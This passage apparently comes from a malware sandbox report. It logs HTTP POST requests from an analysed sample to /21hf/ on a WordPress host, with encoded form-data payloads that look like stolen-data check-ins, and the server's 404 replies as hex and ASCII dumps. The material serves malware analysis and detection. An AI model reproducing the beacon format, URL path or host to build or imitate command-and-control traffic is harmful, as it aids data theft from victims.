                                                Data Ascii: ij60MtY=k3lrS/T5T2y61X7LaiTkklSLCR5hcK/FTa0nvPqklcjP7AEXDwuRsux5Q1neqBXXhEOQTMGXFa7L6QPEBMl63QV5wkKYtXAwvJZa497qnPjI1Xm2UqnE1Luj4VfTUhHkzaPrB7KFVvgdozh+gow9cTYvZSZZ14bis+lbbI3QwxhZ26FBL5CIpmDOOyueN5VwOA==
                                                Aug 27, 2024 08:03:13.760560989 CEST1289INHTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 06:03:13 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: br
                                                Content-Length: 12523
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 53 06 02 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 61 0a 67 16 08 65 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 24 79 b6 24 d9 e7 94 2c f7 1e 19 7a 8f 64 e8 e6 f7 ee 83 ff 0b c5 06 99 b8 7b c1 f6 10 60 16 2c 62 92 6c 12 d7 70 79 7a 61 80 c2 89 37 a2 20 4a f6 31 4c 6b b7 bf cf ba eb 12 44 44 45 40 4d da 7b 89 cb 63 f3 9a 60 a9 46 79 31 91 a9 e1 8c 0d fd 41 ec 93 bc 55 22 99 ef ab 0c d5 66 f7 42 62 1b 43 c9 29 20 75 5b c6 d4 b2 d9 bd ee 17 39 09 57 03 44 62 5d 94 80 c1 d5 9c 6b c0 a4 8b 57 48 77 f4 c7 e3 1c 07 73 4f 8b 42 bc 6f ac 50 ce cb b5 c4 73 59 58 0a 88 1c da 0d 45 5d 15 f5 10 81 04 53 06 57 2a 81 4b 7f 8b 17 05 60 a3 5b 7c 4c 2c 0e ea b2 1b 8c 41 3a 24 34 2e 92 1a 2f 02 53 92 81 83 db a0 eb 3d 70 2c 82 e2 fb c7 13 a2 84 bb c7 3b fa e5 ee f3 8f ef fb 3c 7b 49 f3 0f ad e9 5e c1 ea b6 5a 34 9d 43 7a 19 5b ed eb fd 62 b7 0d 2f 3d 0c 95 53 f4 a0 da e3 eb [TRUNCATED]
                                                Data Ascii: SAI?TM||}grz+ "Cw^\LoK"9dage^=$y$,zd{`,blpyza7 J1LkDDE@M{c`Fy1AU"fBbC) u[9WDb]kWHwsOBoPsYXE]SW*K`[|L,A:$4./S=p,;<{I^Z4Cz[b/=SUS<(2i\!o);nb@.b~#D "fynmn)t<u4&{i)D<"aEOa&/|AQ"v8Giv~mo2j8Oyv)|q1tJW~JYr^h'q0)r}om8%0O{]{$m|yWh"O-?O{U;^-/i<N+x*}';)*Z$vu:`w}'%/|$Uof;R^l?*LlBj*5TM*?Ow?qX+Q2mEO&cFOy:TeK[Cko.r%+6[ZMtAmMo(KM9&A-]\w-"\ftS\4N
                                                Aug 27, 2024 08:03:13.760643005 CEST1289INData Raw: b4 fa 6e 9b 21 3c 61 29 88 9c bf fb 16 2a c6 88 ad d0 ac 3f d0 b5 6a 0d ba aa c4 fc cd fb 2d fc ab b7 af da ea 22 53 1f eb 7e d0 37 37 aa 43 0a cf 71 71 e1 ae 06 8b 7e 29 d3 a3 5f b7 db e6 3f be 2f ac 51 a0 72 5d 96 48 38 2e 8c a2 90 a0 d2 3c 05
                                                Data Ascii: n!<a)*?j-"S~77Cqq~)_?/Qr]H8.<a*[^n|"nVo-%u}+I_&t|? Wsp;kT8'z"t8y|UZ|K+M<kVS9F`_QqZ
                                                Aug 27, 2024 08:03:13.760761023 CEST1289INData Raw: 2c 40 4a 57 cf 03 75 e0 af 74 09 15 aa 70 f7 f9 74 de 2a e7 a9 24 d0 35 12 dd af 4d 31 22 dc d6 56 44 7b 53 b2 02 ee bd f6 c1 e2 8b 10 6c 19 b1 34 8f 4f 39 e3 d1 b2 4d 58 1a 45 f4 f0 59 40 30 29 52 5c 98 a5 70 7a 6d f7 39 e3 f1 49 b0 2c ca fe 10
                                                Data Ascii: ,@JWutpt*$5M1"VD{Sl4O9MXEY@0)R\pzm9I,m2.=2hmbO7:ekX,K/K9|WcE,x"9A^So'9/?S~r}O+]-J""!dCwt%kwBvJo.cp*=1i
                                                Aug 27, 2024 08:03:13.760814905 CEST1289INData Raw: 91 48 45 f0 a0 42 30 f7 87 85 a8 10 ee 13 87 74 4b 53 53 d3 4e 5b 2a 1b 1c c3 cb 60 6f 86 08 37 30 c9 bd 5a c3 f0 40 e7 93 0b 12 f3 82 37 97 93 0b 0e f3 a2 d1 01 a7 10 58 aa ce db f1 f8 c6 59 2c 0e 48 47 e7 48 aa 3b 45 98 ac 9b dc fe 7d b7 95 fd
                                                Data Ascii: HEB0tKSSN[*`o70Z@7XY,HGH;E}vLj[)+qIl={l]J,3OLT5M/mO;Q$Ga-40OgqI#)]L>9.cE5N0g3u~uzf}Z0fRs3VK:
                                                Aug 27, 2024 08:03:13.760885954 CEST1289INData Raw: 5d 3a 8d a3 8b 54 e1 4f a8 be 8d f5 46 78 3d 65 b0 e6 69 5d c0 75 b6 69 ea 4d e2 02 93 84 42 2f ae 1b 46 85 8f 9e d6 05 5c e7 ba 11 db 9a bf 41 41 01 22 67 a0 f0 d1 d3 a4 80 eb e5 26 11 da 9d 60 e5 02 36 45 b4 1c 3a a2 c1 c1 ec be 9b 65 d6 e5 f1
                                                Data Ascii: ]:TOFx=ei]uiMB/F\AA"g&`6E:eyfi4A^ew18@j4]FDZ<<Q_NNlG*,wK5R"H[$$Y39-Zm:DARr"r^=8<'"_p97o%ID+V&w!
                                                Aug 27, 2024 08:03:13.761003017 CEST1289INData Raw: bc 58 8c 8d cf 01 c2 81 e5 92 d6 1b ca bc 3a 31 48 af c2 6d 32 51 b2 0a 1b 84 58 48 40 0d ca f7 23 ad 3c d7 3a c7 14 f6 db 38 14 b8 0b bc 0f 08 8c f7 ed 70 d2 58 b0 b6 83 e4 ef 80 9d 1a 22 d0 68 2a 58 8d 80 c9 16 c6 8b 3d a8 c6 5a d3 f1 62 0d b7
                                                Data Ascii: X:1Hm2QXH@#<:8pX"h*X=Zb1uaB"Pc>`p!Qpo!W-Kl0k #l-Kz7zW1.V<kS+usl-"Uze6*dTDFv.).96H+]A
                                                Aug 27, 2024 08:03:13.761055946 CEST1289INData Raw: 8b 97 6b 5e 67 c7 33 68 fa 18 1e da fe 14 c7 df dd 6e cd 66 42 96 37 09 ce 9d cb a7 90 61 2d 4d 6c a7 ec 7c f4 f0 d2 5c 35 e6 af cc 72 eb 84 fa af 21 dc 08 64 2f a3 41 a7 ef 92 ed 41 fb 6b b7 96 d7 b9 2b 70 6b dc ad 37 17 77 d2 45 f0 4c 36 bc 26
                                                Data Ascii: k^g3hnfB7a-Ml|\5r!d/AAk+pk7wEL6&Y*FL}T8OmLwb1%T6nc"].nyt:*jq`|?$%5n9=kFq>fKe_jo2C+yaYnchj&~|G7/>y\[
                                                Aug 27, 2024 08:03:13.761137009 CEST1289INData Raw: 13 39 5d 31 e8 6d 00 7f e7 2f 5f f2 76 f3 be b8 6b 6e 24 7e 34 78 e6 3e 28 62 19 94 b7 04 cd 40 bb 07 dc b5 af 99 f1 b9 e2 95 f4 76 76 56 79 6d c0 ba 62 31 23 fb a9 79 4f fa 6a 54 0d 86 c2 6f db 21 15 e1 e9 e7 81 be b8 be 23 21 ac 0b 7c 5c fc da
                                                Data Ascii: 9]1m/_vkn$~4x>(b@vvVymb1#yOjTo!#!|\#ICZzY~=yPtykA}/GJw$5F3"E?8t6bQv3x\o4,*v#+8c
                                                Aug 27, 2024 08:03:13.761305094 CEST1289INData Raw: fd 18 a7 89 02 53 4a 07 7b 45 08 55 9d 08 da 13 5e af a4 43 b7 44 04 d9 be d5 77 5e 1c 94 29 a8 40 88 20 80 a3 cf cb 0b 42 05 fa a2 bb 23 9a 16 2b c1 5b 10 99 91 bd 72 b2 9c 0c 56 48 ca 14 06 47 80 2e 83 83 5d 3e 45 69 e8 cd 59 af 9b e2 54 58 47
                                                Data Ascii: SJ{EU^CDw^)@ B#+[rVHG.]>EiYTXG}}R\4cqkw'A_[;[$*&T}.si#jsvHS>~YV)(f)L?B1e,(\6WPc^2
                                                Aug 27, 2024 08:03:13.761390924 CEST1289INData Raw: 02 f8 b3 6f 4d 5d 52 a2 10 ab 38 7a 61 f4 be ef c6 d4 dc 29 70 95 00 24 df 73 55 7b f8 f1 f3 3e 61 b6 bc ef 8a 2e ff 63 3d f6 b5 51 ed 72 27 46 5e be 61 63 8a 8b 0c be 8c 4c 7a 97 44 55 20 05 15 7e 67 a0 a4 7c e0 43 e7 3e 34 d8 d9 1d 99 da f7 b3
                                                Data Ascii: oM]R8za)p$sU{>a.c=Qr'F^acLzDU ~g|C>4cfk3y}oz?rj)!clTv@K ~Nnj\1J$?YGP{HU>Q]iQhgLQl%IBj%nXyS'(
                                                Aug 27, 2024 08:03:13.761403084 CEST30INData Raw: a1 be 75 d3 7d 3c 4c 53 59 0a 06 e7 50 d9 ec 65 29 be 2c 4d 51 49 67 16 88 cc d9 27 88 e6
                                                Data Ascii: u}<LSYPe),MQIg'


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                55192.168.11.2049897103.247.8.5380
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:03:16.119672060 CEST1175OUTPOST /21hf/ HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.asa-malukuutara.com
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.asa-malukuutara.com/21hf/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 6b 33 6c 72 53 2f 54 35 54 32 79 36 31 32 4c 4c 57 68 72 6b 30 31 53 49 4e 78 35 68 57 71 2f 4a 54 61 34 6e 76 4f 65 30 6c 71 4c 50 31 46 67 58 41 7a 32 52 76 75 78 35 4a 46 6e 66 67 68 58 4d 68 45 7a 74 54 4d 4b 58 46 62 66 4c 35 43 33 45 4a 63 6c 31 39 77 56 36 33 6b 4b 5a 70 58 41 36 76 4a 55 31 34 38 2f 71 6e 2f 66 49 30 54 65 32 52 2b 7a 62 34 4c 76 6d 2b 56 66 53 65 42 48 55 7a 61 7a 6a 42 2f 4b 56 56 64 38 64 6f 53 42 2b 68 6f 77 69 46 7a 59 6b 52 79 59 63 6c 35 4b 4c 6c 74 39 6e 53 61 76 58 31 54 74 53 79 61 64 43 54 62 32 57 37 47 50 6a 58 6a 6a 78 4e 36 45 55 4e 6b 4c 61 57 56 54 75 70 66 46 72 74 6f 56 6d 70 78 36 77 62 33 59 49 47 4c 61 6c 48 77 4c 41 6d 74 47 65 43 56 55 61 74 42 61 79 76 31 72 70 4b 41 69 57 49 6d 47 65 43 73 67 5a 4e 77 70 78 75 75 56 59 70 64 52 6c 4c 44 47 7a 77 7a 48 66 71 75 61 5a 4f 35 4b 4b 50 61 69 72 35 55 5a 46 32 33 61 77 52 61 64 56 44 59 78 77 39 37 37 36 30 64 71 76 54 61 73 52 4d 6b 49 48 55 2f 41 59 79 58 6f 4f 4a 50 78 4c 4a 34 [TRUNCATED]
                                                Data Ascii: ij60MtY=k3lrS/T5T2y612LLWhrk01SINx5hWq/JTa4nvOe0lqLP1FgXAz2Rvux5JFnfghXMhEztTMKXFbfL5C3EJcl19wV63kKZpXA6vJU148/qn/fI0Te2R+zb4Lvm+VfSeBHUzazjB/KVVd8doSB+howiFzYkRyYcl5KLlt9nSavX1TtSyadCTb2W7GPjXjjxN6EUNkLaWVTupfFrtoVmpx6wb3YIGLalHwLAmtGeCVUatBayv1rpKAiWImGeCsgZNwpxuuVYpdRlLDGzwzHfquaZO5KKPair5UZF23awRadVDYxw97760dqvTasRMkIHU/AYyXoOJPxLJ4vYyBmYBoCS0ikqOt4o7y9FZU/C5m5HQbeJU0f60bBxL5tRmNqK8kswXGyFUjPKp3TW4byKGoUqK1a4wqb+SmXQUy1Ir8HBiWYMdfbnVpKgPuf7PMCM1Hi5ckmHOiqUJJMjCgo8XQ+0a6mqZNWvyvEJ3Bk4LPMOBBKv26s0X8cMwgMJgxK+SfI5Z4VnrlVpdUBfvmcxPIhniCo=
                                                Aug 27, 2024 08:03:16.639406919 CEST1289INHTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 06:03:16 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: br
                                                Content-Length: 12523
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 53 06 02 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 61 0a 67 16 08 65 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 24 79 b6 24 d9 e7 94 2c f7 1e 19 7a 8f 64 e8 e6 f7 ee 83 ff 0b c5 06 99 b8 7b c1 f6 10 60 16 2c 62 92 6c 12 d7 70 79 7a 61 80 c2 89 37 a2 20 4a f6 31 4c 6b b7 bf cf ba eb 12 44 44 45 40 4d da 7b 89 cb 63 f3 9a 60 a9 46 79 31 91 a9 e1 8c 0d fd 41 ec 93 bc 55 22 99 ef ab 0c d5 66 f7 42 62 1b 43 c9 29 20 75 5b c6 d4 b2 d9 bd ee 17 39 09 57 03 44 62 5d 94 80 c1 d5 9c 6b c0 a4 8b 57 48 77 f4 c7 e3 1c 07 73 4f 8b 42 bc 6f ac 50 ce cb b5 c4 73 59 58 0a 88 1c da 0d 45 5d 15 f5 10 81 04 53 06 57 2a 81 4b 7f 8b 17 05 60 a3 5b 7c 4c 2c 0e ea b2 1b 8c 41 3a 24 34 2e 92 1a 2f 02 53 92 81 83 db a0 eb 3d 70 2c 82 e2 fb c7 13 a2 84 bb c7 3b fa e5 ee f3 8f ef fb 3c 7b 49 f3 0f ad e9 5e c1 ea b6 5a 34 9d 43 7a 19 5b ed eb fd 62 b7 0d 2f 3d 0c 95 53 f4 a0 da e3 eb [TRUNCATED]
                                                Data Ascii: SAI?TM||}grz+ "Cw^\LoK"9dage^=$y$,zd{`,blpyza7 J1LkDDE@M{c`Fy1AU"fBbC) u[9WDb]kWHwsOBoPsYXE]SW*K`[|L,A:$4./S=p,;<{I^Z4Cz[b/=SUS<(2i\!o);nb@.b~#D "fynmn)t<u4&{i)D<"aEOa&/|AQ"v8Giv~mo2j8Oyv)|q1tJW~JYr^h'q0)r}om8%0O{]{$m|yWh"O-?O{U;^-/i<N+x*}';)*Z$vu:`w}'%/|$Uof;R^l?*LlBj*5TM*?Ow?qX+Q2mEO&cFOy:TeK[Cko.r%+6[ZMtAmMo(KM9&A-]\w-"\ftS\4N
                                                Aug 27, 2024 08:03:16.639492035 CEST1289INData Raw: b4 fa 6e 9b 21 3c 61 29 88 9c bf fb 16 2a c6 88 ad d0 ac 3f d0 b5 6a 0d ba aa c4 fc cd fb 2d fc ab b7 af da ea 22 53 1f eb 7e d0 37 37 aa 43 0a cf 71 71 e1 ae 06 8b 7e 29 d3 a3 5f b7 db e6 3f be 2f ac 51 a0 72 5d 96 48 38 2e 8c a2 90 a0 d2 3c 05
                                                Data Ascii: n!<a)*?j-"S~77Cqq~)_?/Qr]H8.<a*[^n|"nVo-%u}+I_&t|? Wsp;kT8'z"t8y|UZ|K+M<kVS9F`_QqZ
                                                Aug 27, 2024 08:03:16.639543056 CEST1289INData Raw: 2c 40 4a 57 cf 03 75 e0 af 74 09 15 aa 70 f7 f9 74 de 2a e7 a9 24 d0 35 12 dd af 4d 31 22 dc d6 56 44 7b 53 b2 02 ee bd f6 c1 e2 8b 10 6c 19 b1 34 8f 4f 39 e3 d1 b2 4d 58 1a 45 f4 f0 59 40 30 29 52 5c 98 a5 70 7a 6d f7 39 e3 f1 49 b0 2c ca fe 10
                                                Data Ascii: ,@JWutpt*$5M1"VD{Sl4O9MXEY@0)R\pzm9I,m2.=2hmbO7:ekX,K/K9|WcE,x"9A^So'9/?S~r}O+]-J""!dCwt%kwBvJo.cp*=1i
                                                Aug 27, 2024 08:03:16.639616013 CEST1289INData Raw: 91 48 45 f0 a0 42 30 f7 87 85 a8 10 ee 13 87 74 4b 53 53 d3 4e 5b 2a 1b 1c c3 cb 60 6f 86 08 37 30 c9 bd 5a c3 f0 40 e7 93 0b 12 f3 82 37 97 93 0b 0e f3 a2 d1 01 a7 10 58 aa ce db f1 f8 c6 59 2c 0e 48 47 e7 48 aa 3b 45 98 ac 9b dc fe 7d b7 95 fd
                                                Data Ascii: HEB0tKSSN[*`o70Z@7XY,HGH;E}vLj[)+qIl={l]J,3OLT5M/mO;Q$Ga-40OgqI#)]L>9.cE5N0g3u~uzf}Z0fRs3VK:
                                                Aug 27, 2024 08:03:16.639930964 CEST1289INData Raw: 5d 3a 8d a3 8b 54 e1 4f a8 be 8d f5 46 78 3d 65 b0 e6 69 5d c0 75 b6 69 ea 4d e2 02 93 84 42 2f ae 1b 46 85 8f 9e d6 05 5c e7 ba 11 db 9a bf 41 41 01 22 67 a0 f0 d1 d3 a4 80 eb e5 26 11 da 9d 60 e5 02 36 45 b4 1c 3a a2 c1 c1 ec be 9b 65 d6 e5 f1
                                                Data Ascii: ]:TOFx=ei]uiMB/F\AA"g&`6E:eyfi4A^ew18@j4]FDZ<<Q_NNlG*,wK5R"H[$$Y39-Zm:DARr"r^=8<'"_p97o%ID+V&w!
                                                Aug 27, 2024 08:03:16.640007019 CEST1289INData Raw: bc 58 8c 8d cf 01 c2 81 e5 92 d6 1b ca bc 3a 31 48 af c2 6d 32 51 b2 0a 1b 84 58 48 40 0d ca f7 23 ad 3c d7 3a c7 14 f6 db 38 14 b8 0b bc 0f 08 8c f7 ed 70 d2 58 b0 b6 83 e4 ef 80 9d 1a 22 d0 68 2a 58 8d 80 c9 16 c6 8b 3d a8 c6 5a d3 f1 62 0d b7
                                                Data Ascii: X:1Hm2QXH@#<:8pX"h*X=Zb1uaB"Pc>`p!Qpo!W-Kl0k #l-Kz7zW1.V<kS+usl-"Uze6*dTDFv.).96H+]A
                                                Aug 27, 2024 08:03:16.640063047 CEST1289INData Raw: 8b 97 6b 5e 67 c7 33 68 fa 18 1e da fe 14 c7 df dd 6e cd 66 42 96 37 09 ce 9d cb a7 90 61 2d 4d 6c a7 ec 7c f4 f0 d2 5c 35 e6 af cc 72 eb 84 fa af 21 dc 08 64 2f a3 41 a7 ef 92 ed 41 fb 6b b7 96 d7 b9 2b 70 6b dc ad 37 17 77 d2 45 f0 4c 36 bc 26
                                                Data Ascii: k^g3hnfB7a-Ml|\5r!d/AAk+pk7wEL6&Y*FL}T8OmLwb1%T6nc"].nyt:*jq`|?$%5n9=kFq>fKe_jo2C+yaYnchj&~|G7/>y\[
                                                Aug 27, 2024 08:03:16.640127897 CEST1289INData Raw: 13 39 5d 31 e8 6d 00 7f e7 2f 5f f2 76 f3 be b8 6b 6e 24 7e 34 78 e6 3e 28 62 19 94 b7 04 cd 40 bb 07 dc b5 af 99 f1 b9 e2 95 f4 76 76 56 79 6d c0 ba 62 31 23 fb a9 79 4f fa 6a 54 0d 86 c2 6f db 21 15 e1 e9 e7 81 be b8 be 23 21 ac 0b 7c 5c fc da
                                                Data Ascii: 9]1m/_vkn$~4x>(b@vvVymb1#yOjTo!#!|\#ICZzY~=yPtykA}/GJw$5F3"E?8t6bQv3x\o4,*v#+8c
                                                Aug 27, 2024 08:03:16.640213966 CEST1289INData Raw: fd 18 a7 89 02 53 4a 07 7b 45 08 55 9d 08 da 13 5e af a4 43 b7 44 04 d9 be d5 77 5e 1c 94 29 a8 40 88 20 80 a3 cf cb 0b 42 05 fa a2 bb 23 9a 16 2b c1 5b 10 99 91 bd 72 b2 9c 0c 56 48 ca 14 06 47 80 2e 83 83 5d 3e 45 69 e8 cd 59 af 9b e2 54 58 47
                                                Data Ascii: SJ{EU^CDw^)@ B#+[rVHG.]>EiYTXG}}R\4cqkw'A_[;[$*&T}.si#jsvHS>~YV)(f)L?B1e,(\6WPc^2
                                                Aug 27, 2024 08:03:16.640270948 CEST1289INData Raw: 02 f8 b3 6f 4d 5d 52 a2 10 ab 38 7a 61 f4 be ef c6 d4 dc 29 70 95 00 24 df 73 55 7b f8 f1 f3 3e 61 b6 bc ef 8a 2e ff 63 3d f6 b5 51 ed 72 27 46 5e be 61 63 8a 8b 0c be 8c 4c 7a 97 44 55 20 05 15 7e 67 a0 a4 7c e0 43 e7 3e 34 d8 d9 1d 99 da f7 b3
                                                Data Ascii: oM]R8za)p$sU{>a.c=Qr'F^acLzDU ~g|C>4cfk3y}oz?rj)!clTv@K ~Nnj\1J$?YGP{HU>Q]iQhgLQl%IBj%nXyS'(
                                                Aug 27, 2024 08:03:16.640280962 CEST30INData Raw: a1 be 75 d3 7d 3c 4c 53 59 0a 06 e7 50 d9 ec 65 29 be 2c 4d 51 49 67 16 88 cc d9 27 88 e6
                                                Data Ascii: u}<LSYPe),MQIg'


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                56192.168.11.2049898103.247.8.5380
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:03:18.996213913 CEST1289OUTPOST /21hf/ HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.asa-malukuutara.com
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.asa-malukuutara.com/21hf/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 6b 33 6c 72 53 2f 54 35 54 32 79 36 31 32 4c 4c 57 68 72 6b 30 31 53 49 4e 78 35 68 57 71 2f 4a 54 61 34 6e 76 4f 65 30 6c 71 44 50 31 7a 73 58 41 53 32 52 75 75 78 35 42 6c 6e 43 67 68 57 4f 68 45 62 70 54 4d 57 74 46 5a 58 4c 35 78 2f 45 4b 75 4e 31 36 77 56 2f 34 45 4b 58 74 58 41 75 76 4a 59 70 34 38 37 36 6e 50 37 49 31 54 75 32 56 4d 62 45 67 4c 75 6a 2b 56 66 57 4a 78 48 63 7a 61 48 4a 42 36 53 56 56 66 49 64 70 68 35 2b 6d 2f 63 69 64 54 59 72 49 69 59 74 2b 4a 4b 71 6c 74 35 5a 53 61 76 74 31 53 5a 53 79 5a 56 43 42 4b 32 52 37 6d 50 6a 49 54 6a 79 47 61 49 75 4e 6b 48 43 57 56 50 75 70 66 74 72 73 49 56 6d 69 77 36 7a 62 58 59 4f 43 4c 62 7a 44 77 48 59 6d 74 36 4b 43 55 41 61 74 56 79 79 73 69 2f 70 46 45 4f 57 55 32 47 59 4d 4d 67 47 48 51 70 74 75 74 73 37 70 64 78 54 4c 41 4b 7a 69 42 50 66 38 61 4f 59 4a 5a 4b 45 44 36 69 6c 76 6b 56 4a 32 33 4c 78 52 61 63 59 44 5a 31 77 2b 4c 4c 36 7a 76 43 73 51 4b 74 58 45 45 4a 48 65 66 4d 47 79 58 30 77 4a 4d 68 62 4a 2f [TRUNCATED]
                                                Data Ascii: ij60MtY=k3lrS/T5T2y612LLWhrk01SINx5hWq/JTa4nvOe0lqDP1zsXAS2Ruux5BlnCghWOhEbpTMWtFZXL5x/EKuN16wV/4EKXtXAuvJYp4876nP7I1Tu2VMbEgLuj+VfWJxHczaHJB6SVVfIdph5+m/cidTYrIiYt+JKqlt5ZSavt1SZSyZVCBK2R7mPjITjyGaIuNkHCWVPupftrsIVmiw6zbXYOCLbzDwHYmt6KCUAatVyysi/pFEOWU2GYMMgGHQptuts7pdxTLAKziBPf8aOYJZKED6ilvkVJ23LxRacYDZ1w+LL6zvCsQKtXEEJHefMGyX0wJMhbJ/3YyhmYELaT8SliHN42/y9SZT2r5kUyQoKJVEP6l7ByNZtN/dqIuUswXG+3UjzKqG7WiIaKA+cqM1bSwqaiSjOgUy8pr82qiS8McNjnUoKjE+f+d8CbxHv/ckqcOhCEcrIjDg48TQ+7KqmheNW5lfY83BooLP5DBG2v28l1SNQNpTFFnwyKRusxTZZCm151Tjh/nkAiKr5812UkaenMud1ARxWZlXeEnqFIE42eXR55cLW++m5NiT6xwxElCiWnNlczAgMgVtLlpYEzhNr5f8et+3cefPgMYr6VBK5EPodiAahri0+Dwc934bjgQvjJ
                                                Aug 27, 2024 08:03:18.996284008 CEST7734OUTData Raw: 62 55 32 77 79 45 38 41 41 50 72 59 48 64 58 4e 49 6c 34 73 6e 4c 2b 7a 50 76 58 47 32 78 69 33 6d 39 58 75 42 48 59 44 52 6a 48 52 58 34 6d 37 30 6f 36 78 58 69 4e 59 2b 47 77 64 38 42 4e 66 46 2f 69 6c 67 77 31 72 74 4d 69 49 65 42 75 4a 55 50
                                                Data Ascii: bU2wyE8AAPrYHdXNIl4snL+zPvXG2xi3m9XuBHYDRjHRX4m70o6xXiNY+Gwd8BNfF/ilgw1rtMiIeBuJUPIxBiYh/IESgERhv+ENq7ALg/Tnxq9WZBuNjHkadWTsGjuR3wJU6oZVeMJoDuoKOodiIi/+rHkxTl8eVd13CM84R6TjX3w/PKacgUntRli2gNXHsB2tmddwqaC6ri442VU5XhoQOsgCruOtDE1Gg09YCX7dsCihxfV
                                                Aug 27, 2024 08:03:18.996309042 CEST3867OUTData Raw: 69 72 76 6b 43 58 52 75 5a 47 52 63 70 46 33 75 78 4d 2b 2b 44 51 79 78 4e 6b 65 44 6c 32 58 55 31 4b 58 53 61 6b 43 66 62 6e 66 49 79 4c 54 67 68 75 30 50 5a 34 68 6e 63 76 65 5a 76 45 4d 54 4e 66 4a 6b 48 68 46 4f 35 43 54 43 77 71 6e 7a 2b 47
                                                Data Ascii: irvkCXRuZGRcpF3uxM++DQyxNkeDl2XU1KXSakCfbnfIyLTghu0PZ4hncveZvEMTNfJkHhFO5CTCwqnz+Gchg6PhjG79lAx24LExzXPD3lRiRnCZtEm3e64mBwEKIrbVE95fjZuE3Dssrkr99ladSnyGQVkSE69MqyQMa4ck/lplritsZwRxhnTp44KfJ7ffYRLT+sqpa17cH/3Q3ZJlEid9UIIJ9BYo1Pcy3QXo5kKJGSMtCcW
                                                Aug 27, 2024 08:03:19.345694065 CEST2578OUTData Raw: 45 6f 4a 38 72 32 76 69 65 5a 70 73 75 45 6f 48 33 38 4d 4f 58 67 61 79 44 33 54 4b 31 43 52 6c 6b 38 56 48 43 6f 65 45 42 6e 61 4a 55 2f 64 2f 6c 59 43 73 47 52 71 75 30 50 6b 72 61 54 33 67 68 6d 54 6a 2b 79 37 75 6b 50 64 4b 4f 78 47 64 45 54
                                                Data Ascii: EoJ8r2vieZpsuEoH38MOXgayD3TK1CRlk8VHCoeEBnaJU/d/lYCsGRqu0PkraT3ghmTj+y7ukPdKOxGdETZHwMR60ARKUytHB+Hfp4MlM6+zj81pEZloqg3mioKAyHjQXHkADTF0mfnybDtfUROxpuSu/O1FWCsDZKk09FAd7a8xbXrsrZmGE5fQNNO/hJNGEkHAmTN0pZY6bPYGFdBsfi/FHE6BoxgZCKv+LuqxD/aQDALA5u6
                                                Aug 27, 2024 08:03:19.345861912 CEST19335OUTData Raw: 4f 4a 73 41 50 61 79 35 32 67 49 54 77 2b 74 45 33 30 4e 4e 58 68 63 77 35 74 4f 38 44 47 73 4e 37 79 79 48 6f 4d 67 75 36 61 44 64 42 77 55 41 6a 6b 75 6f 6c 37 68 41 68 74 66 35 62 35 34 37 47 4b 52 35 5a 31 6d 72 64 50 68 59 68 4a 37 71 42 66
                                                Data Ascii: OJsAPay52gITw+tE30NNXhcw5tO8DGsN7yyHoMgu6aDdBwUAjkuol7hAhtf5b547GKR5Z1mrdPhYhJ7qBfnNV1MJpBnhWjrdOsRJRtvPHA6MhDN9t5Wr1VVjQPmxA0beJg7GzvO0H1pBoSK1Nlc7xBt+6J7C1r+yMT91/65ck7MU0Rf9NlOO2Fg6Cg9wRwbV5Z0xHHDbPpGJ6gPy+LWdGsbM3w5o1DIPUgf32p4sb+JssBynBzq
